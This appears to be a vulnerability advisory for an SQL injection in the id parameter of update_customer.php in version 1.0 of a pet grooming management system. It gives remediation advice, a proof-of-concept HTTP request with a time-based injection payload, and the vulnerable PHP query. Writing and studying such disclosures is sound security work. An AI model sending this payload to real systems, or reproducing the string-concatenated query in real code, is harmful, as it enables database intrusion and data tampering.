# SQL Injection Vulnerability Summary in Pet Grooming Management Software ## Vulnerability Overview * **Vulnerability Type**: SQL Injection * **Affected File**: `update_customer.php` * **Affected Parameter**: `id` * **Root Cause**: The application fails to validate the user-supplied `id` parameter and does not filter special characters, allowing user input to be directly concatenated into SQL statements for execution. ## Scope of Impact * **Software Name**: Pet grooming management software * **Software Version**: 1.0 * **Vulnerability Severity**: High (can lead to database data leakage or tampering) ## Remediation * Perform strict type checking on the `id` parameter in `update_customer.php` (e.g., force conversion to an integer). * Use prepared statements or parameterized queries to construct SQL statements, avoiding the direct concatenation of user input. * Filter input data and reject illegal inputs containing special characters. ## Proof of Concept (POC) **HTTP Request Packet:** ```http POST /petgrooming_erp/petgrooming_erp/pet_grooming/admin/update_customer.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 22 Cache-Control: max-age=0 sec-ch-ua: "NOT_A Brand";v="8", "Chromium";v="101" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/petgrooming_erp/petgrooming_erp/pet_grooming/admin/tax.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSIDn4k4uplqn131nak8h2bzujob18 Connection: close id=-1" or sleep(0.5)# ``` **Vulnerable Code Snippet:** ```php $id = $_GET['id']; $sql = "SELECT * FROM tbl_customer where cust_id='$id'"; $result = mysqli_query($conn, $sql); ```